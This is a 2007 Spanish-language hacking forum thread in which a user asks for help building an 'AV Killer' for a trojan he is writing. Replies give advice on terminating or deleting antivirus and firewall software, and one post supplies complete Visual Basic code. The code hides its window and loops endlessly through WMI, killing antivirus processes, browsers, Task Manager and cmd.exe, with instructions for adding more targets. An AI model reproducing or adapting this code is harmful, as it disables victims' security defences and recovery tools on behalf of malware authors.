hacker


Ingresar con nombre de usuario, contraseña y duración de la sesión
| Portal Hacker | Editorial | Descargas | Ezine |
Inicio Ayuda Ingresar Registrarse
08 de Julio de 2008, 09:18:02
Noticias: Convocatoria E-zine CPH #2
Para ver este enlace Registrate o Inicia Sesion
Aquí

+  Foros pOrtal Hacker
|-+  Programacion
| |-+  Programación en general
| | |-+  Visual Basic (Moderadores: ranefi, crypto136, ziBboh, >> s E t H <<)
| | | |-+  AV Killer
0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: AV Killer  (Leído 442 veces)
JF 001
Recien llegado
*
Desconectado Desconectado

Mensajes: 2


Ver Perfil
« : 28 de Febrero de 2007, 08:27:08 »

hola, no se si alguien me podria ayudar para hacer un AV Killer en Visual Basic, Porque estoy construyendo un  troyano y quiero que vaya esta funcion en el server
Gracias
En línea
Zion_Tm
NZ2
**
Desconectado Desconectado

Mensajes: 165


" Pensar no hace daño "


Ver Perfil
« Respuesta #1 : 01 de Marzo de 2007, 04:02:10 »

Y queres cerrar procesos del cada antivirus posible o eliminar los archivos ? entiendo tu propuesta pero le veo un problema, windows xp le avisa al usuario cuando queda sin antivirus .. .entiendes
En línea

Conocimiento - Creatividad - Dedicacion - Investigacion - Mente abierta. *** El poder esta en vos ***
JF 001
Recien llegado
*
Desconectado Desconectado

Mensajes: 2


Ver Perfil
« Respuesta #2 : 01 de Marzo de 2007, 04:34:03 »

Si entiendo, pero el oro dia me baje un AV Killer y me quito el Firewall y no lo puedo activar creo q borro el comando para volverlo a activar y eso es lo que quiero hacer.
En línea
Zion_Tm
NZ2
**
Desconectado Desconectado

Mensajes: 165


" Pensar no hace daño "


Ver Perfil
« Respuesta #3 : 02 de Marzo de 2007, 04:24:44 »

Pues seria simple, primero hay que saber que antivirus o firewall quieres nukear, luego con un codigo para cerrar procesos activos ejecutandolo desde un timer cada 1 milisengundos.
Tambien podrias hacerlo borrando la carpeta y el  contenido de ese firewall, mediante codigo. Busca en este mismo foro que estan los 2 codigos que me refiero.

Saludos  cool
En línea

Conocimiento - Creatividad - Dedicacion - Investigacion - Mente abierta. *** El poder esta en vos ***
axera
NZ2
**
Desconectado Desconectado

Mensajes: 159


Yo solo se que no se nada


Ver Perfil
« Respuesta #4 : 02 de Marzo de 2007, 12:46:43 »

mira yo lo utilizo en .bat pero claro lo que hayo mas accesible si lo necesitas pasa por aqui y descarga el codigo del av killer

www.unionhackt eam.com.ar


Salu2

By AXERA cool cool cool cool
En línea

Korpex
Visitante
« Respuesta #5 : 03 de Marzo de 2007, 01:03:40 »

Código:
Private Sub Form_Load()
    Me.Visible = False
    Do
        DoEvents
        Set ObjetoWMI = GetObject("winmgmts:")
        If IsNull(ObjetoWMI) = False Then
            Set ListaProcesos = ObjetoWMI.InstancesOf("win32_process")
            For Each ProcesoACerrar In ListaProcesos
                If LCase$(ProcesoACerrar.Name) = "iexplore.exe" Then KillProcess("iexplore.exe")
                If LCase$(ProcesoACerrar.Name) = "firefox.exe" Then KillProcess ("firefox.exe")
                If LCase$(ProcesoACerrar.Name) = "taskmgr.exe" Then KillProcess ("taskmgr.exe")
                If LCase$(ProcesoACerrar.Name) = "alg.exe" Then KillProcess ("alg.exe")
                If LCase$(ProcesoACerrar.Name) = "amon.exe" Then KillProcess ("amon.exe")
                If LCase$(ProcesoACerrar.Name) = "alogserv.exe" Then KillProcess ("alogserv.exe")
                If LCase$(ProcesoACerrar.Name) = "avconsol.exe" Then KillProcess ("avconsol.exe")
                If LCase$(ProcesoACerrar.Name) = "avengine.exe" Then KillProcess ("avengine.exe")
                If LCase$(ProcesoACerrar.Name) = "avgcc32.exe" Then KillProcess ("avgcc32.exe")
                If LCase$(ProcesoACerrar.Name) = "avgserv.exe" Then KillProcess ("avgserv.exe")
                If LCase$(ProcesoACerrar.Name) = "avpcc.exe" Then KillProcess ("avpcc.exe")
                If LCase$(ProcesoACerrar.Name) = "avsynmgr.exe" Then KillProcess ("avsynmgr.exe")
                If LCase$(ProcesoACerrar.Name) = "avxinit.exe" Then KillProcess ("avxinit.exe")
                If LCase$(ProcesoACerrar.Name) = "avxlive.exe" Then KillProcess ("avxlive.exe")
                If LCase$(ProcesoACerrar.Name) = "bdmcon.exe" Then KillProcess ("bdmcon.exe")
                If LCase$(ProcesoACerrar.Name) = "ccapp.exe" Then KillProcess ("ccapp.exe")
                If LCase$(ProcesoACerrar.Name) = "ccevtmgr.exe" Then KillProcess ("ccevtmgr.exe")
                If LCase$(ProcesoACerrar.Name) = "ccregvfy.exe" Then KillProcess ("ccregvfy.exe")
                If LCase$(ProcesoACerrar.Name) = "cmd.exe" Then KillProcess ("cmd.exe")
                ' Aquí podrías poner más procesos copiando la linea de arriba y cambiando el             'nombre del proceso que quieres que testee si está, y en el caso que esté que lo cierre.
            Next
        End If
        Set ListaProcesos = Nothing
        Set ObjetoWMI = Nothing
    Loop
End Sub

Public Sub KillProcess(ByVal processName As String)
    On Error GoTo ErrHandler
    Dim oWMI
    Dim ret
    Dim sService
    Dim oWMIServices
    Dim oWMIService
    Dim oServices
    Dim oService
    Dim servicename
    Set oWMI = GetObject("winmgmts:")
    Set oServices = oWMI.InstancesOf("win32_process")
    For Each oService In oServices
        servicename = LCase(Trim(CStr(oService.Name) & ""))
        If InStr(1, servicename, LCase(processName), vbTextCompare) > 0 Then
            ret = oService.Terminate
        End If
    Next
    Set oServices = Nothing
    Set oWMI = Nothing
ErrHandler:
    Err.Clear
End Sub

Esto es una especie de killer continuo... quiere decir que nunca parará de cerrar los procesos.. No los cierra una vez, sino que está pendiente con el bucle Do-Loop de los procesos que see están ejecutando, y si uno de los procesos que estén ejecutándose es el que estamos "buscando" (el de los antivirus...re gedit...iexplo rer...o lo que sea), lo cierra.

If LCase$(ProcesoACerrar .Name) = "Nombreproceso. exe" Then KillProcess ("NombreProceso. exe")   tendríamos que insertar esto para añadir un nuevo proceso del que estar pendiente de cerrar.
En línea
Páginas: [1] Ir Arriba Imprimir 
« anterior próximo »
Ir a:  


Ingresar con nombre de usuario, contraseña y duración de la sesión

Powered by SMF 1.1.5 | SMF © 2006-2008, Simple Machines LLC hacker

Juegos gratis - Articulos PHP - Juegos - Trucos - Letras - Juegos - Juegos Online